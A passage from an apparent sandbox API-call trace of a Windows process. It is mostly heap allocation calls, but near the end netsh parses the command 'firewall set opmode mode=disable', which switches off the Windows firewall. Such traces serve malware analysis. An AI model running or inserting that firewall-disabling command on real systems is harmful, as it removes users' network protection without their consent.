Flags=0x0, Size=0x150) returned 0x318c50 [0175.764] GetProcessHeap () returned 0x2d0000 [0175.764] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a5a0 | out: hHeap=0x2d0000) returned 1 [0175.764] RegisterContext () returned 0x0 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32ae40 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x318c50 | out: hHeap=0x2d0000) returned 1 [0175.765] RegisterContext () returned 0x0 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a5a0 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fdf90 | out: hHeap=0x2d0000) returned 1 [0175.765] RegisterContext () returned 0x0 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x318c50 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a5a0 | out: hHeap=0x2d0000) returned 1 [0175.765] RegisterContext () returned 0x0 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b290 [0175.765] GetProcessHeap () returned 0x2d0000 [0175.765] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x318c50 | out: hHeap=0x2d0000) returned 1 [0175.765] RegisterContext () returned 0x0 [0175.766] GetProcessHeap () returned 0x2d0000 [0175.766] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x230) returned 0x32b460 [0175.766] GetProcessHeap () returned 0x2d0000 [0175.766] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b290 | out: hHeap=0x2d0000) returned 1 [0175.766] RegisterContext () returned 0x0 [0175.766] GetProcessHeap () returned 0x2d0000 [0175.766] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2a0) returned 0x32b6a0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b460 | out: hHeap=0x2d0000) returned 1 [0175.767] RegisterContext () returned 0x0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x310) returned 0x32b290 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b6a0 | out: hHeap=0x2d0000) returned 1 [0175.767] RegisterContext () returned 0x0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fdf90 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.767] RegisterContext () returned 0x0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a5a0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fdf90 | out: hHeap=0x2d0000) returned 1 [0175.767] RegisterContext () returned 0x0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x318c50 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a5a0 | out: hHeap=0x2d0000) returned 1 [0175.767] RegisterContext () returned 0x0 [0175.767] GetProcessHeap () returned 0x2d0000 [0175.767] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b5b0 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x318c50 | out: hHeap=0x2d0000) returned 1 [0175.768] RegisterContext () returned 0x0 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x380) returned 0x32b780 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b290 | out: hHeap=0x2d0000) returned 1 [0175.768] RegisterContext () returned 0x0 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x3f0) returned 0x32bb10 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b780 | out: hHeap=0x2d0000) returned 1 [0175.768] RegisterContext () returned 0x0 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x460) returned 0x336330 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bb10 | out: hHeap=0x2d0000) returned 1 [0175.768] RegisterContext () returned 0x0 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4d0) returned 0x32b780 [0175.768] GetProcessHeap () returned 0x2d0000 [0175.768] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x336330 | out: hHeap=0x2d0000) returned 1 [0175.769] RegisterContext () returned 0x0 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fdf90 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.769] RegisterContext () returned 0x0 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a5a0 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fdf90 | out: hHeap=0x2d0000) returned 1 [0175.769] RegisterContext () returned 0x0 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x318c50 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31a5a0 | out: hHeap=0x2d0000) returned 1 [0175.769] RegisterContext () returned 0x0 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x32b290 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x318c50 | out: hHeap=0x2d0000) returned 1 [0175.769] RegisterContext () returned 0x0 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x230) returned 0x32bc60 [0175.769] GetProcessHeap () returned 0x2d0000 [0175.769] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b290 | out: hHeap=0x2d0000) returned 1 [0175.770] RegisterContext () returned 0x0 [0175.770] GetProcessHeap () returned 0x2d0000 [0175.770] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2a0) returned 0x32b290 [0175.770] GetProcessHeap () returned 0x2d0000 [0175.770] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bc60 | out: hHeap=0x2d0000) returned 1 [0175.770] RegisterContext () returned 0x0 [0175.770] GetProcessHeap () returned 0x2d0000 [0175.770] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fdf90 [0175.770] GetProcessHeap () returned 0x2d0000 [0175.770] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.770] RegisterContext () returned 0x0 [0175.770] GetProcessHeap () returned 0x2d0000 [0175.770] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31a5a0 [0175.770] GetProcessHeap () returned 0x2d0000 [0175.770] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fdf90 | out: hHeap=0x2d0000) returned 1 [0175.770] RegisterContext () returned 0x0 [0175.771] RegisterContext () returned 0x0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x310) returned 0x32bc60 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b290 | out: hHeap=0x2d0000) returned 1 [0175.771] RegisterContext () returned 0x0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x380) returned 0x336330 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bc60 | out: hHeap=0x2d0000) returned 1 [0175.771] RegisterContext () returned 0x0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x540) returned 0x3366c0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b780 | out: hHeap=0x2d0000) returned 1 [0175.771] RegisterContext () returned 0x0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x5b0) returned 0x32b780 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3366c0 | out: hHeap=0x2d0000) returned 1 [0175.771] RegisterContext () returned 0x0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.771] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x620) returned 0x3366c0 [0175.771] GetProcessHeap () returned 0x2d0000 [0175.772] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b780 | out: hHeap=0x2d0000) returned 1 [0175.772] RegisterContext () returned 0x0 [0175.772] GetProcessHeap () returned 0x2d0000 [0175.772] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fdf90 [0175.772] GetProcessHeap () returned 0x2d0000 [0175.772] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0175.772] RegisterContext () returned 0x0 [0175.772] GetProcessHeap () returned 0x2d0000 [0175.772] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x690) returned 0x32b780 [0175.772] GetProcessHeap () returned 0x2d0000 [0175.772] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3366c0 | out: hHeap=0x2d0000) returned 1 [0175.795] RegisterContext () returned 0x0 [0175.795] GetProcessHeap () returned 0x2d0000 [0175.795] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x700) returned 0x340860 [0175.795] GetProcessHeap () returned 0x2d0000 [0175.795] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32b780 | out: hHeap=0x2d0000) returned 1 [0176.721] RegisterContext () returned 0x0 [0176.721] GetProcessHeap () returned 0x2d0000 [0176.721] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe390 [0176.721] GetProcessHeap () returned 0x2d0000 [0176.721] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.728] RegisterContext () returned 0x0 [0176.728] GetProcessHeap () returned 0x2d0000 [0176.728] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31ab40 [0176.728] GetProcessHeap () returned 0x2d0000 [0176.728] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fe390 | out: hHeap=0x2d0000) returned 1 [0176.728] RegisterContext () returned 0x0 [0176.728] GetProcessHeap () returned 0x2d0000 [0176.728] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x770) returned 0x3563f0 [0176.728] GetProcessHeap () returned 0x2d0000 [0176.728] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x340860 | out: hHeap=0x2d0000) returned 1 [0176.728] RegisterContext () returned 0x0 [0176.728] GetProcessHeap () returned 0x2d0000 [0176.728] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe390 [0176.729] GetProcessHeap () returned 0x2d0000 [0176.729] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.729] RegisterContext () returned 0x0 [0176.729] GetProcessHeap () returned 0x2d0000 [0176.729] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x31ac30 [0176.729] GetProcessHeap () returned 0x2d0000 [0176.729] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fe390 | out: hHeap=0x2d0000) returned 1 [0176.729] RegisterContext () returned 0x0 [0176.729] RegisterContext () returned 0x0 [0176.729] RegisterContext () returned 0x0 [0176.729] GetProcessHeap () returned 0x2d0000 [0176.729] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x7e0) returned 0x356b70 [0176.730] GetProcessHeap () returned 0x2d0000 [0176.730] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3563f0 | out: hHeap=0x2d0000) returned 1 [0176.731] RegisterContext () returned 0x0 [0176.731] GetProcessHeap () returned 0x2d0000 [0176.731] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x850) returned 0x357360 [0176.731] GetProcessHeap () returned 0x2d0000 [0176.731] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x356b70 | out: hHeap=0x2d0000) returned 1 [0176.731] RegisterContext () returned 0x0 [0176.731] GetProcessHeap () returned 0x2d0000 [0176.731] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8c0) returned 0x3563f0 [0176.731] GetProcessHeap () returned 0x2d0000 [0176.731] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x357360 | out: hHeap=0x2d0000) returned 1 [0176.732] RegisterContext () returned 0x0 [0176.732] GetProcessHeap () returned 0x2d0000 [0176.732] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe390 [0176.732] GetProcessHeap () returned 0x2d0000 [0176.732] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.732] RegisterContext () returned 0x0 [0176.732] GetProcessHeap () returned 0x2d0000 [0176.732] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x356cf0 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fe390 | out: hHeap=0x2d0000) returned 1 [0176.733] RegisterContext () returned 0x0 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x340860 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x356cf0 | out: hHeap=0x2d0000) returned 1 [0176.733] RegisterContext () returned 0x0 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1c0) returned 0x3409c0 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x340860 | out: hHeap=0x2d0000) returned 1 [0176.733] RegisterContext () returned 0x0 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe390 [0176.733] GetProcessHeap () returned 0x2d0000 [0176.733] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.734] RegisterContext () returned 0x0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe0) returned 0x356cf0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2fe390 | out: hHeap=0x2d0000) returned 1 [0176.734] RegisterContext () returned 0x0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x150) returned 0x340860 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x356cf0 | out: hHeap=0x2d0000) returned 1 [0176.734] RegisterContext () returned 0x0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe390 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.734] RegisterContext () returned 0x0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe410 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.734] RegisterContext () returned 0x0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x930) returned 0x358cc0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.734] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3563f0 | out: hHeap=0x2d0000) returned 1 [0176.734] RegisterContext () returned 0x0 [0176.734] GetProcessHeap () returned 0x2d0000 [0176.735] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x9a0) returned 0x359600 [0176.735] GetProcessHeap () returned 0x2d0000 [0176.735] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x358cc0 | out: hHeap=0x2d0000) returned 1 [0176.953] RegisterContext () returned 0x0 [0176.953] GetProcessHeap () returned 0x2d0000 [0176.953] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa10) returned 0x35eba0 [0176.953] GetProcessHeap () returned 0x2d0000 [0176.953] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x359600 | out: hHeap=0x2d0000) returned 1 [0176.953] RegisterContext () returned 0x0 [0176.953] GetProcessHeap () returned 0x2d0000 [0176.953] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fe590 [0176.953] GetProcessHeap () returned 0x2d0000 [0176.953] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0176.953] SetConsoleCtrlHandler (HandlerRoutine=0xf19198, Add=1) returned 1 [0176.953] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76b10000 [0176.954] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b26d40 [0176.954] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0176.971] FreeLibrary (hLibModule=0x76b10000) returned 1 [0176.971] _wcsicmp (_String1="firewall", _String2="-?") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-h") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="?") returned 39 [0176.971] _wcsicmp (_String1="firewall", _String2="/?") returned 55 [0176.971] _wcsicmp (_String1="firewall", _String2="-v") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-a") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-c") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-f") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-r") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-u") returned 57 [0176.971] _wcsicmp (_String1="firewall", _String2="-p") returned 57 [0176.971] GetVersionExW (in: lpVersionInformation=0x1e7a80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1e7a80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0176.971] _vsnwprintf (in: _Buffer=0xf25b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x1e7a48 | out: _Buffer="6.1.7601") returned 8 [0176.971] _vsnwprintf (in: _Buffer=0xf25fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x1e7a48 | out: _Buffer="7601") returned 4 [0176.972] _vsnwprintf (in: _Buffer=0xf25d90, _BufferCount=0x103, _Format="%d", _ArgList=0x1e7a48 | out: _Buffer="1") returned 1 [0176.972] _vsnwprintf (in: _Buffer=0xf261b0, _BufferCount=0x103, _Format="%d", _ArgList=0x1e7a48 | out: _Buffer="0") returned 1 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a410 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a430 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x34a450 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a470 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc) returned 0x34a490 [0176.972] wcscpy_s (in: _Destination=0x34a490, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a450 | out: hHeap=0x2d0000) returned 1 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a430 | out: hHeap=0x2d0000) returned 1 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a430 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a450 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x42) returned 0x33d2d0 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a4b0 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x34a4d0 [0176.972] wcscpy_s (in: _Destination=0x34a4d0, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f5f0 [0176.972] GetProcessHeap () returned 0x2d0000 [0176.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31ee90 [0176.972] wcscpy_s (in: _Destination=0x31ee90, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f610 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe) returned 0x35f630 [0176.973] wcscpy_s (in: _Destination=0x35f630, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f650 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa) returned 0x35f670 [0176.973] wcscpy_s (in: _Destination=0x35f670, _SizeInWords=0x5, _Source="mode" | out: _Destination="mode") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f690 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x31eeb0 [0176.973] wcscpy_s (in: _Destination=0x31eeb0, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x35f6b0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x35f6d0 [0176.973] wcscpy_s (in: _Destination=0x35f6d0, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x33d2d0 | out: hHeap=0x2d0000) returned 1 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a450 | out: hHeap=0x2d0000) returned 1 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a450 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x35f6f0 [0176.973] wcscpy_s (in: _Destination=0x35f6f0, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a4d0 | out: hHeap=0x2d0000) returned 1 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a4b0 | out: hHeap=0x2d0000) returned 1 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a4b0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x34a4d0 [0176.973] wcscpy_s (in: _Destination=0x34a4d0, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.973] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x35f6f0 | out: hHeap=0x2d0000) returned 1 [0176.973] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x34a450 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x34a450 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x31eec0 [0176.974] wcscpy_s (in: _Destination=0x31eec0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31ee90 | out: hHeap=0x2d0000) returned 1 [0176.974] GetProcessHeap () returned 0x2d0000 [0176.974] HeapFree 